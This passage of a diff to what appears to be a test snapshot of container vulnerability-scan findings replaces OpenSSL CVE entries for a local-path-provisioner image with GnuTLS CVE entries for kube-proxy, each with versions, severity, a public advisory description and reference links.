(alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23839", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "3.6.7-4+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-24659", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23839", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://www.cve.org/CVERecord?id=CVE-2021-23839", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", + "https://access.redhat.com/security/cve/CVE-2020-24659", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", + "https://gitlab.com/gnutls/gnutls/-/issues/1071", + "https://linux.oracle.com/cve/CVE-2020-24659.html", + "https://linux.oracle.com/errata/ELSA-2020-5483.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", + "https://security.gentoo.org/glsa/202009-01", + "https://security.netapp.com/advisory/ntap-20200911-0006/", + "https://ubuntu.com/security/notices/USN-4491-1", + "https://usn.ubuntu.com/4491-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-24659", + "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", ], }, "category": "Vulnerability", - "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An issue was discovered in GnuTLS before 3.6.15. A server can trigger a NULL pointer dereference in a TLS 1.3 client if a no_renegotiation alert is sent with unexpected timing, and then an invalid second handshake occurs. The crash happens in the application's error handling path, where the gnutls_deinit function is called after detecting a handshake failure.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: incorrect SSLv2 rollback protection", + "name": "gnutls: Heap buffer overflow in handshake with no_renegotiation alert sent", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23839", + "value": "https://avd.aquasec.com/nvd/cve-2020-24659", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23839", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00054.html", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00060.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", + "value": "https://access.redhat.com/security/cve/CVE-2020-24659", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24659", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1071", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://linux.oracle.com/cve/CVE-2020-24659.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "value": "https://linux.oracle.com/errata/ELSA-2020-5483.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/62BUAI4FQQLG6VTKRT7SUZPGJJ4NASQ3/", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.gentoo.org/glsa/202009-01", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4491-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4491-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + }, + { + "type": "URL", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", ], }, "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", + "name": "Double free during gnutls_pkcs7_verify", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - }, - { - "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5901-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3450", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3450", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", - "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3450.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://www.cve.org/CVERecord?id=CVE-2021-3450", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-08", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", ], }, "category": "Vulnerability", - "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 